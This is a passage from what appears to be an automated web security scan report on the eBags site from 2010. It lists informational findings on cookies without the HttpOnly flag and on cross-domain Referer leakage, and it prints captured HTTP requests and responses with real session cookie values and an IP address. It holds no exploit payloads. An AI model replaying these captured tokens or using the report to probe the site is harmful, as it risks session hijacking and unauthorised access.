Date: Sun, 26 Dec 2010 13:59:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:59 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 87104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...

3.53. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/carry-on-luggage/20048891
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373793|PC#1293371743230-938821.20#1294581533|check#true#1293371993; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1169; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":3,"to":4.2,"c":"http://www.ebags.com/category/carry-on-luggage/20048891","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1293371932378}; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Bags%252520by%252520eBags%252520%25253A%252520Carry-On%252520Luggage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Febags%25252Fmother-lode-tls-mini-21-wheeled-duffel%25252F125538%25253Fproductid%25253D1325214%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:25 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 91539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...

3.54. http://www.ebags.com/products/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:16:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1662

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.55. http://www.ebags.com/products/view/ZoomColorsViews.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/view/ZoomColorsViews.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/view/ZoomColorsViews.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 503 Page Temporarily Unavailable.
Connection: close
Date: Sun, 26 Dec 2010 14:16:09 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8


                                                               <!DOCTYPE HTML PUBLIC "-//W3C
...[SNIP]...

3.56. http://www.ebags.com/rewards/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /rewards/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rewards/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.57. http://www.ebags.com/shoppingcart/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; mbox=session#1293371743230-938821#1293373808|PC#1293371743230-938821.20#1294581548|check#true#1293372008; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1180; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":4,"to":4.8,"c":"http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1293371947239}; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:38 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 53903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/
...[SNIP]...

3.58. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:54 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:54 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

3.59. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 20 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.ebags.com/blocks/ajax/certonaajax.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/certonaajax.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /blocks/ajax/certonaajax.cfm?_=1293371995145 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a59%3a59+AM&requesttimeout=9000&itemAdded=true
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373852|PC#1293371743230-938821.20#1294581592|check#true#1293372052; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; s_sq=%5B%5BB%5D%5D; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1172; fsr.a=1293371994671

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 14:00:15 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:00:15 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 4146


<!--
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
</titl
...[SNIP]...
href="/product/ebags/mother-lode-tls-junior-25-wheeled-duffel/125548?productid=1325229&rlid=cart&rcode=res10122606500133309746223" title="eBags Mother Lode TLS Junior 25&quot; Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Junior 25&quot; Wheeled Duffel Luggage"></a>
...[SNIP]...
<a href="/product/ebags/packing-cubes-3pc-set/13032?productid=65823&rlid=cart&rcode=res10122606500133309746223" title="eBags Packing Cubes - 3pc Set Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/13032_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Packing Cubes - 3pc Set Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/slim-packing-cubes-3pc-set/107842?productid=1283923&rlid=cart&rcode=res10122606500133309746223" title="eBags Slim Packing Cubes - 3pc Set Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107842_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Slim Packing Cubes - 3pc Set Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/mother-lode-tls-weekender-convertible/143101?productid=1370034&rlid=cart&rcode=res10122606500133309746223" title="eBags Mother Lode TLS Weekender Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Weekender Convertible Backpacks"></a>
...[SNIP]...

4.2. http://www.ebags.com/blocks/ajax/persistentCart.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/ajax/persistentCart.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /blocks/ajax/persistentCart.cfm?itemAdded=true HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214
Origin: http://www.ebags.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; mbox=session#1293371743230-938821#1293373808|PC#1293371743230-938821.20#1294581548|check#true#1293372008; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1180; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":4,"to":4.8,"c":"http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1293371947239}; s_sq=ebagsprod%3D%2526pid%253DProduct%252520Details%252520%25253A%252520125538%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fa1512.g.akamaitech.net%25252Ff%25252F1512%25252F124%25252F1h%25252Fimages.ebags.com%25252Fimg%25252FProductDetail%25252Fadd-to-cart.gif%2526ot%253DIMAGE
Content-Length: 69

cartAction=additem&RequireCookie=YES&modelID=125538&ProductID=1325214

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:59:34 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:34 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 3701


<div id="pcartcontainer">
<div class="pcartleftalign"><a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-header_icon"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_carticon.png" border="0" /></a>
...[SNIP]...
<div class="pcartleftalign"><img class="closeCartLink" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/hdr_closecart.png" border="0" data-linkName="hcart-close" /></div>
...[SNIP]...
<a href="/products/index.cfm?ModelID=125538&productID=1325214" data-linkName="hcart-product1"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" border="0" width="60" height="60" alt="eBags - Mother Lode TLS Mini 21" Wheeled Duffel" /></a>
...[SNIP]...
<a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-view_cart"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_vieworeditmycart.gif" border="0" /></a>
...[SNIP]...
<div class="pcartcontentleft"><img class="closeCartLink" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_continueshopping.gif" border="0" data-linkName="hcart-continue_shopping" /></div>
...[SNIP]...
<a href="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000" data-linkName="hcart-begin_checkout"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_btn_begincheckout.gif" border="0" /></a></div>
</div>
<div><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/pcart_footer.png" border="0" /></div>
...[SNIP]...

4.3. http://www.ebags.com/brands/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

